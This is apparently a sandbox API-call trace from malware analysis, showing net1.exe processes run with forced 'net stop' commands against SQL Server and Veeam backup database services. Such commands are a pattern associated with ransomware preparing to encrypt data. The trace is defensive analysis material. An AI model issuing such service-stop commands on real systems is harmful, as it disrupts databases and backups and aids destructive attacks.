[0104.864] NetApiBufferAllocate (in: ByteCount=0x18, Buffer=0x24f948 | out: Buffer=0x24f948*=0x444d50) returned 0x0 [0104.864] NetApiBufferAllocate (in: ByteCount=0x18, Buffer=0x24f948 | out: Buffer=0x24f948*=0x44c100) returned 0x0 [0104.864] _fileno (_File=0x7fefdba2a80) returned 0 [0104.864] _setmode (_FileHandle=0, _Mode=16384) returned 16384 [0104.864] _wcsicmp (_String1="accounts", _String2="stop") returned -18 [0104.864] _wcsicmp (_String1="computer", _String2="stop") returned -16 [0104.864] _wcsicmp (_String1="config", _String2="stop") returned -16 [0104.864] _wcsicmp (_String1="continue", _String2="stop") returned -16 [0104.864] _wcsicmp (_String1="cont", _String2="stop") returned -16 [0104.864] _wcsicmp (_String1="file", _String2="stop") returned -13 [0104.864] _wcsicmp (_String1="files", _String2="stop") returned -13 [0104.864] _wcsicmp (_String1="group", _String2="stop") returned -12 [0104.864] _wcsicmp (_String1="groups", _String2="stop") returned -12 [0104.864] _wcsicmp (_String1="help", _String2="stop") returned -11 [0104.864] _wcsicmp (_String1="helpmsg", _String2="stop") returned -11 [0104.864] _wcsicmp (_String1="localgroup", _String2="stop") returned -7 [0104.865] _wcsicmp (_String1="pause", _String2="stop") returned -3 [0104.865] _wcsicmp (_String1="session", _String2="stop") returned -15 [0104.865] _wcsicmp (_String1="sessions", _String2="stop") returned -15 [0104.865] _wcsicmp (_String1="sess", _String2="stop") returned -15 [0104.865] _wcsicmp (_String1="share", _String2="stop") returned -12 [0104.865] _wcsicmp (_String1="start", _String2="stop") returned -14 [0104.865] _wcsicmp (_String1="stats", _String2="stop") returned -14 [0104.865] _wcsicmp (_String1="statistics", _String2="stop") returned -14 [0104.865] _wcsicmp (_String1="stop", _String2="stop") returned 0 [0104.865] _wcsicmp (_String1="accounts", _String2="MSSQL$TPSAMA") returned -12 [0104.865] _wcsicmp (_String1="computer", _String2="MSSQL$TPSAMA") returned -10 [0104.865] _wcsicmp (_String1="config", _String2="MSSQL$TPSAMA") returned -10 [0104.865] _wcsicmp (_String1="continue", _String2="MSSQL$TPSAMA") returned -10 [0104.865] _wcsicmp (_String1="cont", _String2="MSSQL$TPSAMA") returned -10 [0104.865] _wcsicmp (_String1="file", _String2="MSSQL$TPSAMA") returned -7 [0104.865] _wcsicmp (_String1="files", _String2="MSSQL$TPSAMA") returned -7 [0104.865] _wcsicmp (_String1="group", _String2="MSSQL$TPSAMA") returned -6 [0104.865] _wcsicmp (_String1="groups", _String2="MSSQL$TPSAMA") returned -6 [0104.865] _wcsicmp (_String1="help", _String2="MSSQL$TPSAMA") returned -5 [0104.865] _wcsicmp (_String1="helpmsg", _String2="MSSQL$TPSAMA") returned -5 [0104.865] _wcsicmp (_String1="localgroup", _String2="MSSQL$TPSAMA") returned -1 [0104.865] _wcsicmp (_String1="pause", _String2="MSSQL$TPSAMA") returned 3 [0104.865] _wcsicmp (_String1="session", _String2="MSSQL$TPSAMA") returned 6 [0104.865] _wcsicmp (_String1="sessions", _String2="MSSQL$TPSAMA") returned 6 [0104.865] _wcsicmp (_String1="sess", _String2="MSSQL$TPSAMA") returned 6 [0104.865] _wcsicmp (_String1="share", _String2="MSSQL$TPSAMA") returned 6 [0104.865] _wcsicmp (_String1="start", _String2="MSSQL$TPSAMA") returned 6 [0104.865] _wcsicmp (_String1="stats", _String2="MSSQL$TPSAMA") returned 6 [0104.865] _wcsicmp (_String1="statistics", _String2="MSSQL$TPSAMA") returned 6 [0104.865] _wcsicmp (_String1="stop", _String2="MSSQL$TPSAMA") returned 6 [0104.865] _wcsicmp (_String1="time", _String2="MSSQL$TPSAMA") returned 7 [0104.865] _wcsicmp (_String1="user", _String2="MSSQL$TPSAMA") returned 8 [0104.865] _wcsicmp (_String1="users", _String2="MSSQL$TPSAMA") returned 8 [0104.866] _wcsicmp (_String1="msg", _String2="MSSQL$TPSAMA") returned -12 [0104.866] _wcsicmp (_String1="messenger", _String2="MSSQL$TPSAMA") returned -14 [0104.866] _wcsicmp (_String1="receiver", _String2="MSSQL$TPSAMA") returned 5 [0104.866] _wcsicmp (_String1="rcv", _String2="MSSQL$TPSAMA") returned 5 [0104.866] _wcsicmp (_String1="netpopup", _String2="MSSQL$TPSAMA") returned 1 [0104.866] _wcsicmp (_String1="redirector", _String2="MSSQL$TPSAMA") returned 5 [0104.866] _wcsicmp (_String1="redir", _String2="MSSQL$TPSAMA") returned 5 [0104.866] _wcsicmp (_String1="rdr", _String2="MSSQL$TPSAMA") returned 5 [0104.866] _wcsicmp (_String1="workstation", _String2="MSSQL$TPSAMA") returned 10 [0104.866] _wcsicmp (_String1="work", _String2="MSSQL$TPSAMA") returned 10 [0104.866] _wcsicmp (_String1="wksta", _String2="MSSQL$TPSAMA") returned 10 [0104.866] _wcsicmp (_String1="prdr", _String2="MSSQL$TPSAMA") returned 3 [0104.866] _wcsicmp (_String1="devrdr", _String2="MSSQL$TPSAMA") returned -9 [0104.866] _wcsicmp (_String1="lanmanworkstation", _String2="MSSQL$TPSAMA") returned -1 [0104.866] _wcsicmp (_String1="server", _String2="MSSQL$TPSAMA") returned 6 [0104.866] _wcsicmp (_String1="svr", _String2="MSSQL$TPSAMA") returned 6 [0104.866] _wcsicmp (_String1="srv", _String2="MSSQL$TPSAMA") returned 6 [0104.866] _wcsicmp (_String1="lanmanserver", _String2="MSSQL$TPSAMA") returned -1 [0104.866] _wcsicmp (_String1="alerter", _String2="MSSQL$TPSAMA") returned -12 [0104.866] _wcsicmp (_String1="netlogon", _String2="MSSQL$TPSAMA") returned 1 [0104.866] _wcsupr (in: _String="MSSQL$TPSAMA" | out: _String="MSSQL$TPSAMA") returned="MSSQL$TPSAMA" [0104.866] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x80000000) returned 0x44ce10 [0104.870] GetServiceKeyNameW (in: hSCManager=0x44ce10, lpDisplayName="MSSQL$TPSAMA", lpServiceName=0xff8a5750, lpcchBuffer=0x24f868 | out: lpServiceName="", lpcchBuffer=0x24f868) returned 0 [0104.871] _wcsicmp (_String1="msg", _String2="MSSQL$TPSAMA") returned -12 [0104.871] _wcsicmp (_String1="messenger", _String2="MSSQL$TPSAMA") returned -14 [0104.871] _wcsicmp (_String1="receiver", _String2="MSSQL$TPSAMA") returned 5 [0104.872] _wcsicmp (_String1="rcv", _String2="MSSQL$TPSAMA") returned 5 [0104.872] _wcsicmp (_String1="redirector", _String2="MSSQL$TPSAMA") returned 5 [0104.872] _wcsicmp (_String1="redir", _String2="MSSQL$TPSAMA") returned 5 [0104.872] _wcsicmp (_String1="rdr", _String2="MSSQL$TPSAMA") returned 5 [0104.872] _wcsicmp (_String1="workstation", _String2="MSSQL$TPSAMA") returned 10 [0104.872] _wcsicmp (_String1="work", _String2="MSSQL$TPSAMA") returned 10 [0104.872] _wcsicmp (_String1="wksta", _String2="MSSQL$TPSAMA") returned 10 [0104.872] _wcsicmp (_String1="prdr", _String2="MSSQL$TPSAMA") returned 3 [0104.872] _wcsicmp (_String1="devrdr", _String2="MSSQL$TPSAMA") returned -9 [0104.872] _wcsicmp (_String1="lanmanworkstation", _String2="MSSQL$TPSAMA") returned -1 [0104.872] _wcsicmp (_String1="server", _String2="MSSQL$TPSAMA") returned 6 [0104.872] _wcsicmp (_String1="svr", _String2="MSSQL$TPSAMA") returned 6 [0104.872] _wcsicmp (_String1="srv", _String2="MSSQL$TPSAMA") returned 6 [0104.872] _wcsicmp (_String1="lanmanserver", _String2="MSSQL$TPSAMA") returned -1 [0104.872] _wcsicmp (_String1="alerter", _String2="MSSQL$TPSAMA") returned -12 [0104.872] _wcsicmp (_String1="netlogon", _String2="MSSQL$TPSAMA") returned 1 [0104.872] NetServiceControl (in: servername=0x0, service="MSSQL$TPSAMA", opcode=0x0, arg=0x0, bufptr=0x24f870 | out: bufptr=0x24f870) returned 0x889 [0104.873] wcscpy_s (in: _Destination=0xff8a80d0, _SizeInWords=0x104, _Source="NETMSG" | out: _Destination="NETMSG") returned 0x0 [0104.873] LoadLibraryW (lpLibFileName="NETMSG") returned 0x75290000 [0104.874] FormatMessageW (in: dwFlags=0x2a00, lpSource=0x75290000, dwMessageId=0x889, dwLanguageId=0x0, lpBuffer=0xff8a5b50, nSize=0x800, Arguments=0xff8a7f90 | out: lpBuffer="The service name is invalid.\r\n") returned 0x1e [0104.875] GetFileType (hFile=0xb) returned 0x2 [0104.875] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x24f738 | out: lpMode=0x24f738) returned 1 [0104.876] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xff8a5b50*, nNumberOfCharsToWrite=0x1e, lpNumberOfCharsWritten=0x24f730, lpReserved=0x0 | out: lpBuffer=0xff8a5b50*, lpNumberOfCharsWritten=0x24f730*=0x1e) returned 1 [0104.876] GetFileType (hFile=0xb) returned 0x2 [0104.876] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x24f738 | out: lpMode=0x24f738) returned 1 [0104.876] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xff881efc*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x24f730, lpReserved=0x0 | out: lpBuffer=0xff881efc*, lpNumberOfCharsWritten=0x24f730*=0x2) returned 1 [0104.877] _ultow (in: _Dest=0x889, _Radix=2422688 | out: _Dest=0x889) returned="2185" [0104.877] FormatMessageW (in: dwFlags=0x2800, lpSource=0x75290000, dwMessageId=0xdba, dwLanguageId=0x0, lpBuffer=0xff8a5b50, nSize=0x800, Arguments=0xff8a7f90 | out: lpBuffer="More help is available by typing NET HELPMSG 2185.\r\n") returned 0x34 [0104.877] GetFileType (hFile=0xb) returned 0x2 [0104.877] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x24f738 | out: lpMode=0x24f738) returned 1 [0104.877] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xff8a5b50*, nNumberOfCharsToWrite=0x34, lpNumberOfCharsWritten=0x24f730, lpReserved=0x0 | out: lpBuffer=0xff8a5b50*, lpNumberOfCharsWritten=0x24f730*=0x34) returned 1 [0104.878] GetFileType (hFile=0xb) returned 0x2 [0104.878] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x24f738 | out: lpMode=0x24f738) returned 1 [0104.878] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xff881efc*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x24f730, lpReserved=0x0 | out: lpBuffer=0xff881efc*, lpNumberOfCharsWritten=0x24f730*=0x2) returned 1 [0104.878] NetApiBufferFree (Buffer=0x444d50) returned 0x0 [0104.878] NetApiBufferFree (Buffer=0x44c100) returned 0x0 [0104.878] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop MSSQL$TPSAMA /y" [0104.879] exit (_Code=2) Process: id = "202" image_name = "net1.exe" filename = "c:\\windows\\system32\\net1.exe" page_root = "0x5519f000" os_pid = "0x137c" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "195" os_parent_pid = "0x418" cmd_line = "C:\\Windows\\system32\\net1 stop MSSQL$VEEAMSQL2008R2 /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea88" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 8086 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 8087 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 8088 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 8089 start_va = 0xf0000 end_va = 0x16ffff entry_point = 0x0 region_type = private name = "private_0x00000000000f0000" filename = "" Region: id = 8090 start_va = 0x77670000 end_va = 0x77818fff entry_point = 0x77670000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 8091 start_va = 0x7efe0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007efe0000" filename = "" Region: id = 8092 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 8093 start_va = 0xff880000 end_va = 0xff8b2fff entry_point = 0xff880000 region_type = mapped_file name = "net1.exe" filename = "\\Windows\\System32\\net1.exe" (normalized: "c:\\windows\\system32\\net1.exe") Region: id = 8094 start_va = 0x7feff990000 end_va = 0x7feff990fff entry_point = 0x7feff990000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 8095 start_va = 0x7fffffb0000 end_va = 0x7fffffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000007fffffb0000" filename = "" Region: id = 8096 start_va = 0x7fffffda000 end_va = 0x7fffffdafff entry_point = 0x0 region_type = private name = "private_0x000007fffffda000" filename = "" Region: id = 8097 start_va = 0x7fffffde000 end_va = 0x7fffffdffff entry_point = 0x0 region_type = private name = "private_0x000007fffffde000" filename = "" Region: id = 8098 start_va = 0x280000 end_va = 0x37ffff entry_point = 0x0 region_type = private name = "private_0x0000000000280000" filename = "" Region: id = 8099 start_va = 0x77550000 end_va = 0x7766efff entry_point = 0x77550000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 8100 start_va = 0x7fefd920000 end_va = 0x7fefd98afff entry_point = 0x7fefd920000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 8101 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 8102 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 8103 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 8104 start_va = 0x170000 end_va = 0x26ffff entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 8105 start_va = 0x530000 end_va = 0x53ffff entry_point = 0x0 region_type = private name = "private_0x0000000000530000" filename = "" Region: id = 8106 start_va = 0x7efe0000 end_va = 0x7f0dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efe0000" filename = "" Region: id = 8107 start_va = 0x7f0e0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007f0e0000" filename = "" Region: id = 8108 start_va = 0x7fef7330000 end_va = 0x7fef7356fff entry_point = 0x7fef7330000 region_type = mapped_file name = "ntdsapi.dll" filename = "\\Windows\\System32\\ntdsapi.dll" (normalized: "c:\\windows\\system32\\ntdsapi.dll") Region: id = 8109 start_va = 0x7fefb050000 end_va = 0x7fefb05bfff entry_point = 0x7fefb050000 region_type = mapped_file name = "dsrole.dll" filename = "\\Windows\\System32\\dsrole.dll" (normalized: "c:\\windows\\system32\\dsrole.dll") Region: id = 8110 start_va = 0x7fefb6e0000 end_va = 0x7fefb6f1fff entry_point = 0x7fefb6e0000 region_type = mapped_file name = "browcli.dll" filename = "\\Windows\\System32\\browcli.dll" (normalized: "c:\\windows\\system32\\browcli.dll") Region: id = 8111 start_va = 0x7fefb7c0000 end_va = 0x7fefb7d3fff entry_point = 0x7fefb7c0000 region_type = mapped_file name = "samcli.dll" filename = "\\Windows\\System32\\samcli.dll" (normalized: "c:\\windows\\system32\\samcli.dll") Region: id = 8112 start_va = 0x7fefb7e0000 end_va = 0x7fefb7f4fff entry_point = 0x7fefb7e0000 region_type = mapped_file name = "wkscli.dll" filename = "\\Windows\\System32\\wkscli.dll" (normalized: "c:\\windows\\system32\\wkscli.dll") Region: id = 8113 start_va = 0x7fefb800000 end_va = 0x7fefb80bfff entry_point = 0x7fefb800000 region_type = mapped_file name = "netutils.dll" filename = "\\Windows\\System32\\netutils.dll" (normalized: "c:\\windows\\system32\\netutils.dll") Region: id = 8114 start_va = 0x7fefb810000 end_va = 0x7fefb825fff entry_point = 0x7fefb810000 region_type = mapped_file name = "netapi32.dll" filename = "\\Windows\\System32\\netapi32.dll" (normalized: "c:\\windows\\system32\\netapi32.dll") Region: id = 8115 start_va = 0x7fefc0a0000 end_va = 0x7fefc0bcfff entry_point = 0x7fefc0a0000 region_type = mapped_file name = "samlib.dll" filename = "\\Windows\\System32\\samlib.dll" (normalized: "c:\\windows\\system32\\samlib.dll") Region: id = 8116 start_va = 0x7fefcca0000 end_va = 0x7fefcccffff entry_point = 0x7fefcca0000 region_type = mapped_file name = "logoncli.dll" filename = "\\Windows\\System32\\logoncli.dll" (normalized: "c:\\windows\\system32\\logoncli.dll") Region: id = 8117 start_va = 0x7fefd3b0000 end_va = 0x7fefd3d2fff entry_point = 0x7fefd3b0000 region_type = mapped_file name = "srvcli.dll" filename = "\\Windows\\System32\\srvcli.dll" (normalized: "c:\\windows\\system32\\srvcli.dll") Region: id = 8118 start_va = 0x7fefdb10000 end_va = 0x7fefdbaefff entry_point = 0x7fefdb10000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 8119 start_va = 0x7fefe330000 end_va = 0x7fefe34efff entry_point = 0x7fefe330000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 8120 start_va = 0x7feff2d0000 end_va = 0x7feff2d7fff entry_point = 0x7feff2d0000 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll") Region: id = 8121 start_va = 0x7feff490000 end_va = 0x7feff4dcfff entry_point = 0x7feff490000 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll") Region: id = 8122 start_va = 0x7feff740000 end_va = 0x7feff81afff entry_point = 0x7feff740000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 8123 start_va = 0x7feff820000 end_va = 0x7feff94cfff entry_point = 0x7feff820000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 8140 start_va = 0x75290000 end_va = 0x75291fff entry_point = 0x75290000 region_type = mapped_file name = "netmsg.dll" filename = "\\Windows\\System32\\netmsg.dll" (normalized: "c:\\windows\\system32\\netmsg.dll") Thread: id = 653 os_tid = 0xd14 [0104.831] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x16f9f0 | out: lpSystemTimeAsFileTime=0x16f9f0*(dwLowDateTime=0xf3a3d930, dwHighDateTime=0x1d48689)) [0104.831] GetCurrentProcessId () returned 0x137c [0104.831] GetCurrentThreadId () returned 0xd14 [0104.831] GetTickCount () returned 0x23f50 [0104.831] QueryPerformanceCounter (in: lpPerformanceCount=0x16f9f8 | out: lpPerformanceCount=0x16f9f8*=1815174900000) returned 1 [0104.833] GetModuleHandleW (lpModuleName=0x0) returned 0xff880000 [0104.833] __set_app_type (_Type=0x1) [0104.833] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0xff899c9c) returned 0x0 [0104.833] __getmainargs (in: _Argc=0xff8a4780, _Argv=0xff8a4790, _Env=0xff8a4788, _DoWildCard=0, _StartInfo=0xff8a479c | out: _Argc=0xff8a4780, _Argv=0xff8a4790, _Env=0xff8a4788) returned 0 [0104.833] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0104.833] GetConsoleOutputCP () returned 0x1b5 [0104.879] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0xff8acec0 | out: lpCPInfo=0xff8acec0) returned 1 [0104.879] SetThreadUILanguage (LangId=0x0) returned 0x7fffffd0409 [0104.881] sprintf_s (in: _DstBuf=0x16f998, _DstSize=0xc, _Format=".%u" | out: _DstBuf=".437") returned 4 [0104.882] setlocale (category=0, locale=".437") returned="English_United States.437" [0104.883] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0104.883] GetStdHandle (nStdHandle=0xfffffff4) returned 0xb [0104.883] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop MSSQL$VEEAMSQL2008R2 /y" [0104.883] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x16f730, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\net1.exe" (normalized: "c:\\windows\\system32\\net1.exe")) returned 0x1c [0104.883] _wcsnicmp (_String1="/Y", _String2="/y", _MaxCount=0x2) returned 0 [0104.883] NetApiBufferAllocate (in: ByteCount=0x18, Buffer=0x16f988 | out: Buffer=0x16f988*=0x294d60) returned 0x0 [0104.883] NetApiBufferAllocate (in: ByteCount=0x18, Buffer=0x16f988 | out: Buffer=0x16f988*=0x29c130) returned 0x0 [0104.884] _fileno (_File=0x7fefdba2a80) returned 0 [0104.884] _setmode (_FileHandle=0, _Mode=16384) returned 16384 [0104.884] _wcsicmp (_String1="accounts", _String2="stop") returned -18 [0104.884] _wcsicmp (_String1="computer", _String2="stop") returned -16 [0104.884] _wcsicmp (_String1="config", _String2="stop") returned -16 [0104.884] _wcsicmp (_String1="continue", _String2="stop") returned -16 [0104.884] _wcsicmp (_String1="cont", _String2="stop") returned -16 [0104.884] _wcsicmp (_String1="file", _String2="stop") returned -13 [0104.884] _wcsicmp (_String1="files", _String2="stop") returned -13 [0104.884] _wcsicmp (_String1="group", _String2="stop") returned -12 [0104.884] _wcsicmp (_String1="groups", _String2="stop") returned -12 [0104.884] _wcsicmp (_String1="help", _String2="stop") returned -11 [0104.884] _wcsicmp (_String1="helpmsg", _String2="stop") returned -11 [0104.884] _wcsicmp (_String1="localgroup", _String2="stop") returned -7 [0104.884] _wcsicmp (_String1="pause", _String2="stop") returned -3 [0104.884] _wcsicmp (_String1="session", _String2="stop") returned -15 [0104.884] _wcsicmp (_String1="sessions", _String2="stop") returned -15 [0104.884] _wcsicmp (_String1="sess", _String2="stop") returned -15 [0104.884] _wcsicmp (_String1="share", _String2="stop") returned -12 [0104.884] _wcsicmp (_String1="start", _String2="stop") returned -14 [0104.884] _wcsicmp (_String1="stats", _String2="stop") returned -14 [0104.884] _wcsicmp (_String1="statistics", _String2="stop") returned -14 [0104.884] _wcsicmp (_String1="stop", _String2="stop") returned 0 [0104.885] _wcsicmp (_String1="accounts", _String2="MSSQL$VEEAMSQL2008R2") returned -12 [0104.885] _wcsicmp (_String1="computer", _String2="MSSQL$VEEAMSQL2008R2") returned -10 [0104.885] _wcsicmp (_String1="config", _String2="MSSQL$VEEAMSQL2008R2") returned -10 [0104.885] _wcsicmp (_String1="continue", _String2="MSSQL$VEEAMSQL2008R2") returned -10 [0104.885] _wcsicmp (_String1="cont", _String2="MSSQL$VEEAMSQL2008R2") returned -10 [0104.885] _wcsicmp (_String1="file", _String2="MSSQL$VEEAMSQL2008R2") returned -7 [0104.885] _wcsicmp (_String1="files", _String2="MSSQL$VEEAMSQL2008R2") returned -7 [0104.885] _wcsicmp (_String1="group", _String2="MSSQL$VEEAMSQL2008R2") returned -6 [0104.885] _wcsicmp (_String1="groups", _String2="MSSQL$VEEAMSQL2008R2") returned -6 [0104.885] _wcsicmp (_String1="help", _String2="MSSQL$VEEAMSQL2008R2") returned -5 [0104.885] _wcsicmp (_String1="helpmsg", _String2="MSSQL$VEEAMSQL2008R2") returned -5 [0104.885] _wcsicmp (_String1="localgroup", _String2="MSSQL$VEEAMSQL2008R2") returned -1 [0104.885] _wcsicmp (_String1="pause", _String2="MSSQL$VEEAMSQL2008R2") returned 3 [0104.885] _wcsicmp (_String1="session", _String2="MSSQL$VEEAMSQL2008R2") returned 6 [0104.885] _wcsicmp (_String1="sessions", _String2="MSSQL$VEEAMSQL2008R2") returned 6 [0104.885] _wcsicmp (_String1="sess", _String2="MSSQL$VEEAMSQL2008R2") returned 6 [0104.885] _wcsicmp (_String1="share", _String2="MSSQL$VEEAMSQL2008R2") returned 6 [0104.885] _wcsicmp (_String1="start", _String2="MSSQL$VEEAMSQL2008R2") returned 6 [0104.885] _wcsicmp (_String1="stats", _String2="MSSQL$VEEAMSQL2008R2") returned 6 [0104.885] _wcsicmp (_String1="statistics", _String2="MSSQL$VEEAMSQL2008R2") returned 6 [0104.885] _wcsicmp (_String1="stop", _String2="MSSQL$VEEAMSQL2008R2") returned 6 [0104.885] _wcsicmp (_String1="time", _String2="MSSQL$VEEAMSQL2008R2") returned 7 [0104.885] _wcsicmp (_String1="user", _String2="MSSQL$VEEAMSQL2008R2") returned 8 [0104.885] _wcsicmp (_String1="users", _String2="MSSQL$VEEAMSQL2008R2") returned 8 [0104.885] _wcsicmp (_String1="msg", _String2="MSSQL$VEEAMSQL2008R2") returned -12 [0104.885] _wcsicmp (_String1="messenger", _String2="MSSQL$VEEAMSQL2008R2") returned -14 [0104.885] _wcsicmp (_String1="receiver", _String2="MSSQL$VEEAMSQL2008R2") returned 5 [0104.885] _wcsicmp (_String1="rcv", _String2="MSSQL$VEEAMSQL2008R2") returned 5 [0104.885] _wcsicmp (_String1="netpopup", _String2="MSSQL$VEEAMSQL2008R2") returned 1 [0104.885] _wcsicmp (_String1="redirector", _String2="MSSQL$VEEAMSQL2008R2") returned 5 [0104.885] _wcsicmp (_String1="redir", _String2="MSSQL$VEEAMSQL2008R2") returned 5 [0104.885] _wcsicmp (_String1="rdr", _String2="MSSQL$VEEAMSQL2008R2") returned 5 [0104.885] _wcsicmp (_String1="workstation", _String2="MSSQL$VEEAMSQL2008R2") returned 10 [0104.885] _wcsicmp (_String1="work", _String2="MSSQL$VEEAMSQL2008R2") returned 10 [0104.886] _wcsicmp (_String1="wksta", _String2="MSSQL$VEEAMSQL2008R2") returned 10 [0104.886] _wcsicmp (_String1="prdr", _String2="MSSQL$VEEAMSQL2008R2") returned 3 [0104.886] _wcsicmp (_String1="devrdr", _String2="MSSQL$VEEAMSQL2008R2") returned -9 [0104.886] _wcsicmp (_String1="lanmanworkstation", _String2="MSSQL$VEEAMSQL2008R2") returned -1 [0104.886] _wcsicmp (_String1="server", _String2="MSSQL$VEEAMSQL2008R2") returned 6 [0104.886] _wcsicmp (_String1="svr", _String2="MSSQL$VEEAMSQL2008R2") returned 6 [0104.886] _wcsicmp (_String1="srv", _String2="MSSQL$VEEAMSQL2008R2") returned 6 [0104.886] _wcsicmp (_String1="lanmanserver", _String2="MSSQL$VEEAMSQL2008R2") returned -1 [0104.886] _wcsicmp (_String1="alerter", _String2="MSSQL$VEEAMSQL2008R2") returned -12 [0104.886] _wcsicmp (_String1="netlogon", _String2="MSSQL$VEEAMSQL2008R2") returned 1 [0104.886] _wcsupr (in: _String="MSSQL$VEEAMSQL2008R2" | out: _String="MSSQL$VEEAMSQL2008R2") returned="MSSQL$VEEAMSQL2008R2" [0104.886] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x80000000) returned 0x29ce40 [0104.890] GetServiceKeyNameW (in: hSCManager=0x29ce40, lpDisplayName="MSSQL$VEEAMSQL2008R2", lpServiceName=0xff8a5750, lpcchBuffer=0x16f8a8 | out: lpServiceName="", lpcchBuffer=0x16f8a8) returned 0 [0104.891] _wcsicmp (_String1="msg", _String2="MSSQL$VEEAMSQL2008R2") returned -12 [0104.891] _wcsicmp (_String1="messenger", _String2="MSSQL$VEEAMSQL2008R2") returned -14 [0104.891] _wcsicmp (_String1="receiver", _String2="MSSQL$VEEAMSQL2008R2") returned 5 [0104.891] _wcsicmp (_String1="rcv", _String2="MSSQL$VEEAMSQL2008R2") returned 5 [0104.891] _wcsicmp (_String1="redirector", _String2="MSSQL$VEEAMSQL2008R2") returned 5 [0104.891] _wcsicmp (_String1="redir", _String2="MSSQL$VEEAMSQL2008R2") returned 5 [0104.891] _wcsicmp (_String1="rdr", _String2="MSSQL$VEEAMSQL2008R2") returned 5 [0104.892] _wcsicmp (_String1="workstation", _String2="MSSQL$VEEAMSQL2008R2") returned 10 [0104.892] _wcsicmp (_String1="work", _String2="MSSQL$VEEAMSQL2008R2") returned 10 [0104.892] _wcsicmp (_String1="wksta", _String2="MSSQL$VEEAMSQL2008R2") returned 10 [0104.892] _wcsicmp (_String1="prdr", _String2="MSSQL$VEEAMSQL2008R2") returned 3 [0104.892] _wcsicmp (_String1="devrdr", _String2="MSSQL$VEEAMSQL2008R2") returned -9 [0104.892] _wcsicmp (_String1="lanmanworkstation", _String2="MSSQL$VEEAMSQL2008R2") returned -1 [0104.892] _wcsicmp (_String1="server", _String2="MSSQL$VEEAMSQL2008R2") returned 6 [0104.892] _wcsicmp (_String1="svr", 